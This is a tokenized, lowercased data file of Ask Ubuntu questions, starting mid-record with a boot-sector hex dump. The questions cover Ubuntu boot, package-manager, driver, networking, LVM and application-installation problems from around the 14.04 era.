000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 | ... ? ... ... .af ... | 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.f..~..u9.~*| 000000c0 00 77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.f.f ... ... ..| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |.. , ... ... } ..| ... | 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t. < .t ... ... ... | 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 | ... } ... } ... ... ..| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f`.~ ... . .fj.fp.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |sfh ... ..b.v @ ... .| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fxfxfxfx.3f ; f.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..n.f ... .| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f ... .v ... .v| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f | @ ... ... ... ... fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |.t ... ..f @ iu..boo| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |tmgr ... ... ..| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 44 69 | ... ... ... ... ..di| 000001b0 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 65 73 73 |sk error ... press| 000001c0 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 65 73 74 | any key to rest| 000001d0 61 72 74 0d 0a 00 00 00 00 00 00 00 00 00 00 00 |art ... ... ... ... .| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 ac 01 b9 01 00 00 55 aa | ... ... ... ... ..u.| 00000200 =============================== stderr messages : =============================== cat : /tmp/bootinfo-wx1jigrb/tmp_log : no such file or directory edit : result of sudo update-grub after commenting the lines suggested by amantethy : $ sudo update-grub generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-32-generic found initrd image : /boot/initrd.img-3.13.0-32-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin done
507435	booting problems	so , my computer decided to hate me and will not boot linux ubuntu but will boot windows 7 ( slowly compared to its usual , but it will ) . maybe someone can help me . begin : running /scripts/local-bottom ... . done . begin : running /scripts/local-bottom ... mount mounting /dev on /root/dev failed : no such file or directory done . mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg .
507436	how do you get unity8-desktop-session running on your ubuntu ?	https : //launchpad.net/unity8-desktop-session is the current implementation of unity8 for the desktop . it is very early days . what are the steps needed get this up and running as a native environment ?
507437	fresh install of kubuntu 14.04 on desktop system will not shutdown . why ?	i 've recently made the switch on my desktop system to kubuntu 14.04 after years of using microsoft windows . the issue i am having is after fresh install of kubuntu 14.04 my system will not completely shutdown now i have to press and hold power button to make the machine go off . i have done some research online and tried many different methods to resolve this issue but to no avail , no matter what i try the issue still remains . can anyone please help me ? system specs : 1 x 1 t.b.desktop hard disc drive s.a.t.a @ 7200 r.p.m. , 1 x 24x s.a.t.a . dvd writer optical drive intel dg33bu socket lga775 motherboard motherboard essentials : status end of interactive support launch date q2'07 board form factor microatx max memory size ( dependent on memory type ) 8 gb memory types ddr2-800/677 number of memory channels 2 number of dimms slots 4 ecc memory supported ‡ no using this : system ram ( memory ) ddr2-800 pc2-6400 800mhz . x 2 2 g.b.ea.x 2 @ 4 g.b . total integrated graphics ‡ yes ( not being used . ) graphics output vga number of displays supported ‡ 2 discrete graphics pcie x16 using this addon adapter : nvidia geforce gt 610 palit 2gb ddr3 core speed 810 mhz help icon transistor size 40nm architecture fermi gf119 help icon texture mapping units 8 sli/crossfire support no texture rate 6.5 gtexel/s dedicated no render output units 4 release date 01 may 2012 pixel rate 3.2 gpixel/s memory 2048mb directx 11 memory speed 535mhz shader model 5.0 memory bus 64 bit open gl version 4.2 memory type ddr3 max resolution 2560x1600 memory bandwidth 8.6 gb/sec hdmi connections 1 spus 48 dvi connections 1 spu performance 96 vga connections 1 expansion options : pci support 2 pcie x1 gen 2.x 1 pcie x4 gen 2.x 0 pcie x8 gen 2.x 0 pcie x16 gen 2.x 1 i/o specifications : usb 2.0 configuration ( back + internal ) 6+6 total number of sata ports 4 number of esata ports 0 raid configuration n/a number of pata ports 1 number of parallel ports 0 number of serial ports 1 audio ( back channel + front channel ) 6-ch integrated lan 10/100/1000 firewire 1+1 package specifications : max cpu configuration 1 advanced technologies : intel® virtualization technology for directed i/o ( vt-d ) ‡ no intel® vpro technology ‡ no intel® me firmware version n/a intel® remote wake technology no intel® remote pc assist technology no intel® cira technology no tpm no intel® quiet system technology yes intel® hd audio technology no intel® matrix storage technology no intel® platform protection technology : trusted execution technology ‡ no anti-theft technology no using this c.p.u . : intel® core™2 quad processor q6600 ( 8m cache , 2.40 ghz , 1066 mhz fsb ) essentials : status end of life launch date q1'07 processor number q6600 number of cores 4 clock speed 2.4 ghz l2 cache 8 mb fsb speed 1066 mhz fsb parity no instruction set 64-bit embedded options available none lithography 65 nm max tdp 105 w vid voltage range 0.8500v-1.500v package specifications : tcase b3=62.2°c ; g0=71°c package size 37.5mm x 37.5mm processing die size 286 mm2 number of processing die transistors 582 million sockets supported lga775 low halogen options available advanced technologies : intel® turbo boost technology ‡ no intel® hyper-threading technology ‡ no intel® virtualization technology ( vt-x ) ‡ yes intel® 64 ‡ yes idle states yes enhanced intel speedstep® technology yes intel® demand based switching no thermal monitoring technologies yes intel® data protection technology aes new instructions no intel® platform protection technology trusted execution technology ‡ no execute disable bit ‡ yes
507439	could not exec dpkg ! e : sub-process /usr/bin/dpkg returned an error code ( 100 )	i m using 12.04 .. i m unble to perform any installation or remove b'coz i lost my dpkg in /usr/bin/dpkg i tried with following procedure mkdir /tmp/dpkg cd /tmp/dpkg wget http : //archive.ubuntu.com/ubuntu/pool/main/d/dpkg/dpkg_1.15.5.6ubuntu4_i386.deb ar x dpkg*.deb data.tar.gz tar xfvz data.tar.gz ./usr/bin/dpkg sudo cp ./usr/bin/dpkg /usr/bin/ sudo apt-get update but , i got an error after perform wget command tar xfvz data.tar.gz ./usr/bin/dpkg tar ( child ) : data.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now can anyone help me in this.. !
507443	i ca n't do updates , the manager wo n't show	here 's a screencap , it 's been stuck like that since i last updated 8 days ago . what should i do , reinstall the update manager , or something in the terminal ? i 'd like at least to make it work again . thanks in advance . http : //i.imgur.com/3e2sv0b.png
507444	error on root 's path ?	i 'm using ubuntu gnome 14.04 and recently i 've been getting some weird error on the terminal , i 've never seen it before . here 's a code i entered and received the error : lucas @ lucas-pc : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libc-bin the following new packages will be installed : libc-bin 0 upgraded , 1 newly installed , 0 to remove and 8 not upgraded . 3 not fully installed or removed . need to get 0 b/1.170 kb of archives . after this operation , 3.532 kb of additional disk space will be used . do you want to continue ? [ y/n ] y warning : the following packages can not be authenticated ! libc-bin install these packages without verification ? [ y/n ] y ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17. dpkg : warning : 'ldconfig ' not found in path or not executable dpkg : error : 1 expected program not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin e : sub-process /usr/bin/dpkg returned an error code ( 2 ) i ca n't really just reinstall ubuntu because today is exactly the day i installed everything that i needed to work and study ! does anyone have a solution ? also , considering i just know how to do some things on terminal , but not an expert , could you guys please leave the code ?
507448	how to debug my irexec scripts ?	i 've sucessfuly configured my harmony remote to contrl xbmc . everything is fine , except that i can not start xbmc when i press the poweron button . there are a lot of nice tutorials about how to do it , but it is not working . how do i debug this problem ? is there a log for irxevent or irexec ? i know that the system receives my button press , but i ca n't find where the problem is .
507449	how to move taskbar to bottom position as in windows	i 'm very new to ubuntu . i have just installed it on my pc and i liked it . but as i 'm from windows background i like the taskbar at the bottom and not at the left position . so is there any way to move it to bottom position ? i searched on the net and found a solution but it is for 32 bit version 11.10 and i 'm using version 14.04 lts the latest one on 64 bit machine . thanks for your kind help .
507450	how to burn an iso file larger 4.7 gb onto a dvd	i downloaded centos everything iso which about 6.4gb in size however i could not write that iso file onto a dvd using k3b tool as it is showing blank dvd does n't have enough space . i want to dual boot my computer one with ubuntu and another one with centos , for installing centos i need to write that everything iso on to the dvd which is of 4.7 gb in capacity and then go for installation . how should i ?
507452	developing nodejs for ubuntu touch:	i 'm new here and interested in developing apps for ubuntu touch . already got the developer version running on a tablet model p3110 . what i 'd like to know is if it 's compatible with nodejs or if it 's possible to create apps using that technology given that i read it accepts javascript . or is it better to use html5/qml ? if so , why ? thanks in advance !
507455	why does the size of a file and its other hard link appear doubled ?	when i create the hard link for a file ( eg- fun ( 2kb ) ) , it shows the file with the same size ( fun-hard ) . these two files are pointing to same inode so their combined properties should display only 2kb . but it is displaying 4kb . why ?
507457	configuration of $ qtdir	i installed qt from ubuntu repository . i 'm on trusty . now i use a another program who need $ qtdir but when i enter echo $ qtdir , the terminal output nothing . how to set up this path without reinstalling qt4 ? any informations are welcome . cheers ,
507459	pil install in ubuntu 14.04.1 lts	followed the steps how do i install python imaging library ( pil ) ? for pre-setup libraries to install pil on ubuntu 14.04 . however when i run pip install pil -- allow-external pil -- allow-unverified pil seeing the following errors : building '_imagingft ' extension x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i/usr/include/freetype2 -ilibimaging -i/usr/include -i/usr/include/tcl8.6 -i/usr/local/include -i/usr/include/python2.7 -c _imagingft.c -o build/temp.linux-x86_64-2.7/_imagingft.o _imagingft.c:73:31 : fatal error : freetype/fterrors.h : no such file or directory # include < freetype/fterrors.h > ^ compilation terminated . error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cleaning up ... command /usr/bin/python -c `` import setuptools , tokenize ; __file__='/tmp/pip_build_ubuntu/pil/setup.py ' ; exec ( compile ( getattr ( tokenize , 'open ' , open ) ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-3ckd6n-record/install-record.txt -- single-version-externally-managed -- compile failed with error code 1 in /tmp/pip_build_ubuntu/pil traceback ( most recent call last ) : file `` /usr/local/bin/pip '' , line 9 , in < module > load_entry_point ( 'pip==1.5.6 ' , 'console_scripts ' , 'pip ' ) ( ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.5.6-py2.7.egg/pip/__init__.py '' , line 185 , in main return command.main ( cmd_args ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.5.6-py2.7.egg/pip/basecommand.py '' , line 161 , in main text = '\n'.join ( complete_log ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xe2 in position 57 : ordinal not in range ( 128 )
507460	stuck trying to securely access my home network from my android phone over 3g/4g	first , i am able to use simple port forwarding on my router to access each ip cam individually . this is an unsecured method and is exactly the solution i am trying to get away from . i am a linux professional . i can handle my own on the ubuntu side , however ; i am not so much technically savvy on the android side . i 've spent a good amount of time trying various methods mentioned below . the primary problem is that i just do n't have a beaucoup amount of time debugging to get this to work ; hence my post . i am looking for the simplest solution to achieve my requirement . i want to securely access multiple services from my android phone over 4g/3g on my natted home network using my ubuntu server as the gateway . when i say securely , i mean using an encrypted protocol to connect to my ubuntu server , using multiple levels of authentication to reach my final end point application such as my ip webcam . my phone is anhtc one m8 running android 4.4.2 rooted using weaksauce . the server on my internal network is ubuntu 14.04 . i 've unsuccessfully tried using openvpn v2.3.2 on ubuntu and openvpn on my android . i 've spent hours trying get this method and the other listed below to work . way too many permutations of configuration and application choices to even attempt to list here . i 've tried pptp v1.3.4 on ubuntu with the android vpn client unsuccessfully again i am looking for the quickest way for my requirements to be met . i am open to the above methods but thinking below is the way to go . the solution i am leaning towards is using proxydroid and ssh autotunnel on my android to port forward port 3128 to reach squid v3.3.8 on my ubuntu . the current problem i am running into is that ssh autotunnel complains that it can not create the port forward because port 3128 is already opened by squid . i 've used this solution years ago using putty on windows and squid on my linux system . technically i am doing the same thing with ssh autotunnel so i do not understand why i am getting this error this time .
507464	one time grub rescue error	hello ubuntu community ! i use both linux and win 8. recently i deleted a partition by mistake but was able to boot through these commands ; grub rescue > set prefix= ( hd0,6 ) /boot/grub grub rescue > set root=hd0,6 grub rescue > insmod normal grub rescue > normal however , i have to do this every time i restart . how can i solve this once and for all ? thanks
507468	playonlinux missing opengl 32 libraries	so i 'm using kubuntu 64 bit . ( well that 's ubuntu forum , but this is ubuntu derivative so i thought you might help me ) and i wanted to install league of legends through playonlinux ( 4.2.4 ) . on 32 bit systems ( kubuntu and ubuntu ) process went flawlessly , but here playonlinux gives me error : i am using radeon r7 ( r7 265 2gb oc ) drivers installed through drivers section fglrx - 13.35.5 [ mar . 12 2014 ] so far i have tried these solutions given in forums : sudo apt-get install ia32-libs from here and tried this post here , but did n't install give libraries at all . since this is my first time playing with linux 64 bit . i have no idea what am i doing ! if someone could help i would appreciate that ! hey ! ! i have solved this by entering dpkg -- add-architecture i386 then removed old ati drivers : sudo apt-get purge fglrx* remove xorg.conf : sudo rm /etc/x11/xorg.conf reinstall xorg : sudo apt-get install -- reinstall xserver-xorg-core libgl1-mesa-glx : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : amd64 libgl1-mesa-dri : amd64 reconfigure xorg : sudo dpkg-reconfigure xserver-xorg reboot download latest amd drivers from website and install using this simple youtube guide that 's it ! ! playonlinux error is gone ! ! works perfectly fine ! this worked on amd radeon r7 265 oc
507469	acs support in hostapd for ubuntu 12.04	i understand that acs has been implemented in the current version of hostapd . is there a backport of a hostapd version that supports acs for ubuntu 12.04 ? is it possible to compile the latest version on ubuntu 12.04 lts ?
507470	wifi not working on ubuntu 14.04 lenovo g 50-30	i am facing problem to enable wifi on my lenovo g50-30 below are the command out put please help me out lspci | grep -i wireless 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8723be pcie wireless network adapter nm-tool networkmanager tool state : disconnected device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 28 : d2:44:81:36:0b capabilities : carrier detect : yes wired properties carrier : off device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8723be state : unavailable default : no hw address : 14:2d:27:21:8d:47 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points nmcli nm running state wifi-hardware wifi wwan-hardware wwan running disconnected disabled disabled enabled disabled sudo rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : yes 2 : hci0 : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no
507471	if linux can support ntfs file system then why can not it be installed on same ?	after learning basics of installation and types of file system , i found that linux ( ubuntu ) can open , create and delete file on an ntfs file system , where as windows ca n't even see ext series ! so my question if linux can scan and modify the file operations on ntfs why ca n't it be installed on an ntfs partition ( irrespective of primary or logical ) .
507472	openssl getting rollback automatically to default version in ubuntu 12.04.4	i have installed ubuntu 12.04.4 on my machine and it got heartbleed version of openssl 1.0.1 . so i uninstalled openssl 1.0.1 and install new 1.0.1h version by refering this link . i have applied patch for 1.0.1h version and this installed openssl successfully . now on the second day , i am seeing openssl reverted back to 1.0.1 ( default version which comes with ubuntu 12.04.4 ) . is there any setting or configuration that automatically replaces openssl to its default version ? how will i stop this automatic rollback of openssl to default version ?
507475	problem installing ubuntu 14.04 through virtual box on windows 8	i wanted to practice linux on my windows 8 machine , so i downloaded oracle virtualbox and mounted an ubuntu iso image on it , but , it is not running and giving error if it starts . this is the error : failed to open a session for the virtual machine linus_ubuntu . the virtual machine 'linus_ubuntu ' has terminated unexpectedly during startup with exit code 1 . result code : e_fail ( 0x80004005 ) component : machine interface : imachine { 480cf695-2d8d-4256-9c7c-cce4184fa048 }
507480	how to install kingsoft office in ubuntu 14.04 64 bit ?	i install ubuntu 14.04 last night , every is fine except the trouble in installing kingsoft office which is widely used in china , i googled a lot , nothing happened . has someone succeeded in using it ?
507481	can i change actions upon inactivity and timeout for that from command line ?	how do i set the policy about what action should be taken if the computer is inactive for some time . this can be easily done from gui , via power manager . i am trying to do this from command line . i need to essentially set the action to `` suspend '' , and `` when inactive for '' time to 10 minutes . any thoughts ?
507482	launching google chrome from docky	i have installed google-chrome-sable by using google-chrome-stable_current_amd64.deb on my ubuntu 14.04 . i am able to start the browser by typing google-chrome-stable in my terminal . my issue is how do i launch chrome from docky . i am able to add a link to chrome in my taskbar and when i click on this launcher icon another chrome-google-chrome icon gets added to the launcher as shown below : http : //i.imgur.com/h3efpod.png and now i go to the docky , right click on the chrome icon and select 'pin to dock ' . after this i close my browser . now i try to relaunch the chrome by selecting the pinned google-chrome icon as shown below : http : //i.imgur.com/eyhov0q.png but the chrome does not launch from here . i also tried dragging the 'google chrome ' icon to docky but it doesnt get pinned to the dock . any suggestions ?
507487	my wifi does not want to go on	when i try to turn on my wifi under the network settings , it does not want to go on . although i get lucky sometimes and it goes on , it does not pick up any wireless networks . other times it seems to work when i restart the computer , but not always . is this a common bug ? any advice how to fix it ?
507493	panoramtech ads on firefox ( showip extension )	since yesterday noscript - the extension for firefox , blocks a request to `` panoramtech.net '' . after some researches , it seems that panoramtech is a malware . how could my linux system catch it ? what should i do for safely and definitively remove it from my kubuntu 14.04 ?
507496	how to start gui application with upstart ?	i have struggled with this problem for three days and i have tried many ways to solve it but not successful yet . i hope you guys can help me ... i have an gui application . i want to start this application automatically . and when it goes down or closed unexpectedly , i want to reopen this application . i tried to use upstart script , however although there is no problem about services with upstart , gui application is not starting with upstart script . it says can not connect x server . should i add or change some settings to open with upstart or is there any way to open gui application automatically when unexpected exit or shut down occurs ( not just once after login i mean not with startup ) ?
507498	how to remove unnecessary cdrom device from the `` files '' app as i do n't have a cdrom ?	i do n't have a cdrom device therefore the i 'd like to remove the cdrom icon under the 'devices ' section in ubuntu 's 'files ' app . how can i do that ? it seems to be a bug that the cdrom icon pops up in the first place . screenshot : http : //i.imgur.com/y3taeuk.png ( with popped-up error when i click on the icon )
507500	mn-730 wireless card not working in xubuntu	when i go to connect to a network , nothing shows up . i have found the windows drivers to it and would like to know if there is a way to download these windows drivers to xubuntu ? if not , is there a trick to making it work ?
507502	program for compressing and downloading updates in ubuntu like delta rpm in fedora	i would like to know if there are any programs in ubuntu that compress the size of the updates to be downloaded from the repositories to save the bandwidth while updating the system with mobile data network . looking for a software in ubuntu similar to delta rpm in fedora .
507506	when i try to install or remove any software from ubuntu software center it comes with error:	there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 306 , in _process_transaction self._apply_changes ( trans ) file `` /usr/lib/python3/dist-packages/aptdaemon/pkcompat.py '' , line 3155 , in _apply_changes install_range ) file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 1132 , in _apply_changes with self._frozen_status ( ) : file `` /usr/lib/python3.4/contextlib.py '' , line 59 , in __enter__ return next ( self.gen ) file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 1157 , in _frozen_status shutil.copy ( self._status_orig , frozen_dir ) file `` /usr/lib/python3.4/shutil.py '' , line 228 , in copy copyfile ( src , dst , follow_symlinks=follow_symlinks ) file `` /usr/lib/python3.4/shutil.py '' , line 109 , in copyfile copyfileobj ( fsrc , fdst ) file `` /usr/lib/python3.4/shutil.py '' , line 69 , in copyfileobj fdst.write ( buf ) oserror : [ errno 28 ] no space left on device
507508	changed account setting to not require password on login and now i can not login	so i was temporarily making it so that my bro could log onto my laptop without me being there since i would be going out tonight , so under user settings i checked the box that said something along the lines of `` do not require password on login '' , and then when i restarted my laptop and attempted to log in , the screen went black and then back to the login prompt . i am running ubuntu 14.04 with xfce .
507510	weird partitions after fresh ubuntu 14.04 lts install	i 've installed ubuntu 14.04 lts on a clean ssd driver . install went fine and now when using df command i am getting following results : what is : 1 ) /sys/fs/cgroup 2 ) /dev 3 ) /run 4 ) /run/lock 5 ) /run/shm 6 ) /run/user 7 ) dev/sda1 /boot/efi could someone explain please . and why on some partitions it has `` none '' in a filesystem column ?
507512	which ubuntu version is suitatable for gazebo and ros hydro simulator ?	i am working on server with 64 bit,8gb ram,500gb hd and nvidia tesla c2050 . i have to use gazebo and ros hydro simulator for simulating purpose . if anyone has work experience and idea in this field.plz let me know . what should i do ?
507513	gnome 3 shell not redrawing + trailing windows	some fella asked a similar question in trailing windows after installing gnome shell ! ; since i am not allowed to leave any comments there i have to kind-of repost this problem . in two of my ubuntu installations ( 14-04 and 14-10 ) the gnome 3 shell is not working , in addition to the trailing windows mentioned in the related link , i observed that windows are closing , but the shell fails to redraw afterwards . so basically the closed window seem to remain open , but is not clickable any more . once i click e.g . on `` activities '' in the upper left corner , the shell redraws and the window disappears . i tried all of the things mentioned in the link above . does anyone have a suggestion ? thanks in advance !
507514	postfix using gmail relay : must issue a starttls command first	i get this error : must issue a starttls command first with all sent mail . can anyone see why ? main.cf : relayhost= [ smtp.gmail.com ] :587 smtp_connection_cache_destinations= [ smtp.gmail.com ] :587 # tls parameters smtpd_use_tls = yes smtpd_sasl_auth_enable = yes smtpd_tls_auth_only = no smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_tls_note_starttls_offer = yes smtp_tls_policy_maps = hash : /etc/postfix/tls_policy smtp_tls_security_level = encrypt # sasl configuration smtp_use_tls = yes smtp_sasl_auth_enable = yes smtp_enforce_tls = no smtp_sasl_password_maps = hash : /etc/postfix/sasl_passwd smtp_sasl_security_options = noanonymous smtp_sasl_mechanism_filter = plain smtp_sasl_tls_security_options = noanonymous tls_policy [ smtp.gmail.com ] :587 encrypt sasl_passwd smtp.gmail.com:587 name @ gmail.com : password and , yes , i have run postmap on all the data files and have reloaded postfix after making changes . tia
507516	cycle through windows in kde on ubuntu 14.04	i just switched from gnome to kde on ubuntu 14.04 . is there a keyboard shortcut to cycle through applications in kde , such that if the same application has multiple open windows , only the first is shown in the switcher ? i see that i can use alt+tab to walk through all windows , but if i have a lot of windows open for a single application , i have to step through all of those windows . also , the task switcher in the bottom panel seems to work as i want , except that there is no keyboard shortcut . i have to move the mouse down to the panel and click on the tab .
507521	juju charm relation hooks are not running ?	hi i have developed two charms server charm and application charm.i need to add relation between them and and want to get server ip address for application charm.i have added relation-joined and relation-changed hook files for both server charm and application charm.then i can build relationships between them.now i have problem my relation-joined and relation-changed hook files are not running.only running config-changed , install and start hooks files.this is the way i followed . ( how do i add a relationship between two charms to pass information between them ? anyone tell me why these relation hooks are not running.and how the flow working for relation hooks . thanks sajith
507522	lvm partitions not `` available '' on boot	on my ubuntu trusty amd64 , kde desktop build i have 2 lvm2 pvs , each with a single vg . each vg contains 2 or more lvs . on boot ( a ) none of the lvs are `` available '' so can not be mounted from fstab they generate error s at boot time ( b ) once kde is started none of the lvs is available ( c ) the lvs can easily be made available with `` vgchange -ay '' and all is well until the next reboot . in addition , none of the lvs report any free space information background - during a test install of another distro the lvm meta-data was all deleted . i managed to recover the lvm volumes using the saved metadata but this problem of boot not activating lvs emerged . i have installed other distros to test , and other ubuntu installs - all have the same problem . this suggests there 's something in the lvm data / metadata there are no apparently relevant messages in dmesg i cant see any issues with /etc/lvm/lvm.conf pvscan / vgscan / lvscan all complete ok without finding any errors all the data is located on a single hdd , in one single extent lvs lv vg attr lsize pool origin data % move log copy % convert lvwin-data virt-test -wi-a -- -- 20.00g lvwin7_kvm virt-test -wi-a -- -- 260.00g lvwin7_kvm_copy virt-test -wi-a -- -- 260.00g lvwin7a virt-test -wi-a -- -- 512.00g lvwin7ub virt-test -wn-a -- -- 40.00g lvwin7ub-pre-catalyst virt-test -wi-a -- -- 40.00g lxc_images virt-test -wn-a -- -- 100.00g programming_data virt-test -wi-a -- -- 50.00g xen-test-snap virt-test swi-a-s -- 30.00g xen-test-win7 38.57 xen-test-win7 virt-test owi-a-s -- 150.00g /etc/lvm/lvm.conf devices { dir = `` /dev '' scan = [ `` /dev '' ] obtain_device_list_from_udev = 1 preferred_names = [ ] filter = [ `` a/ . */ '' ] cache_dir = `` /run/lvm '' cache_file_prefix = `` '' write_cache_state = 1 sysfs_scan = 1 multipath_component_detection = 1 md_component_detection = 1 md_chunk_alignment = 1 data_alignment_detection = 1 data_alignment = 0 data_alignment_offset_detection = 1 ignore_suspended_devices = 0 disable_after_error_count = 0 require_restorefile_with_uuid = 1 pv_min_size = 2048 issue_discards = 1 } allocation { maximise_cling = 1 mirror_logs_require_separate_pvs = 0 thin_pool_metadata_require_separate_pvs = 0 } log { verbose = 0 silent = 0 syslog = 1 overwrite = 0 level = 0 indent = 1 command_names = 0 prefix = `` `` } backup { backup = 1 backup_dir = `` /etc/lvm/backup '' archive = 1 archive_dir = `` /etc/lvm/archive '' retain_min = 10 retain_days = 30 } shell { history_size = 100 } global { umask = 077 test = 0 units = `` h '' si_unit_consistency = 1 activation = 1 proc = `` /proc '' locking_type = 1 wait_for_locks = 1 fallback_to_clustered_locking = 1 fallback_to_local_locking = 1 locking_dir = `` /run/lock/lvm '' prioritise_write_locks = 1 abort_on_internal_errors = 0 metadata_read_only = 0 mirror_segtype_default = `` mirror '' use_lvmetad = 0 thin_check_executable = `` /usr/sbin/thin_check '' thin_check_options = [ `` -q '' ] } activation { checks = 0 udev_sync = 1 udev_rules = 1 verify_udev_operations = 0 retry_deactivation = 1 missing_stripe_filler = `` error '' use_linear_target = 1 reserved_stack = 64 reserved_memory = 8192 process_priority = -18 mirror_region_size = 512 readahead = `` auto '' raid_fault_policy = `` warn '' mirror_log_fault_policy = `` allocate '' mirror_image_fault_policy = `` remove '' snapshot_autoextend_threshold = 100 snapshot_autoextend_percent = 20 thin_pool_autoextend_threshold = 100 thin_pool_autoextend_percent = 20 use_mlockall = 0 monitoring = 0 polling_interval = 15 } # # # # # # # # # # # # # # # # # # # # # advanced section # # # # # # # # # # # # # # # # # # # # # dmeventd { mirror_library = `` libdevmapper-event-lvm2mirror.so '' snapshot_library = `` libdevmapper-event-lvm2snapshot.so '' thin_library = `` libdevmapper-event-lvm2thin.so '' } any debugging suggestions are welcome
507524	network unclaimed for all network adapters	i know other people had this problem but i could not find a valid solution which fixes my problem . i have no done a fresh install or anything . suddenly all my network devices disapeared and when i run lshw -c network i can see my wireless and ethernet adapter are unclaimed . i ahve no idea how this happened but here are the some more results around this . i am unable to transfer results from my laptop or connect it to internet so oi can only post product details for now : rtl8111/8168/8411 pci express gigabyte ethernet controller and ifconfig -a only displays lo which is my loopback controller .
507525	vlc installation error	while installing vlc media player on my ubuntu 14.04 lts , it states this problem : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time .
507526	reset firefox from command line	mozilla firefox gives an option to reset it . check the below images to ee how its done graphically ; i need to make a script where this can be done through bash . can someone tell me the command which can do this ?
507527	apt-get install stuck at `` unpacking wine ... ''	i 'm running ubuntu 14.04 lts and using an ordinary apt-get install playonlinux command to have it installed . however , it is always getting stuck at ( i.e . does n't do anything further ) : preparing to unpack ... /wine1.6-amd64_1 % 3a1.6.2-0ubuntu4_amd64.deb ... unpacking wine1.6-amd64 ( 1:1.6.2-0ubuntu4 ) over ( 1:1.6.2-0ubuntu4 ) ... i have already tried running apt-get [ auto ] clean , apt-get update , also tried manually downloading from a different mirror and installing the package manually with dpkg -i , but all those attempts had the same outcome : stuck at unpacking wine1.6-amd64 . running sudo apt-get -f install or sudo dpkg -- configure -a due to the broken earlier installation attempt did n't help either . and now looks like the 2 wine packages on my system are in a very inconsistent shape : thatguy @ neverland : /var $ dpkg -l wine1.6* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-====================================-=======================-=======================-============================================================================== iu wine1.6 1:1.6.2-0ubuntu4 amd64 microsoft windows compatibility layer ( binary emulator and library ) ihr wine1.6-amd64 1:1.6.2-0ubuntu4 amd64 ( no description available ) rhr wine1.6-i386 1:1.6.2-0ubuntu4 i386 microsoft windows compatibility layer ( 32-bit support ) please help saving my bacon ! thanks , - r
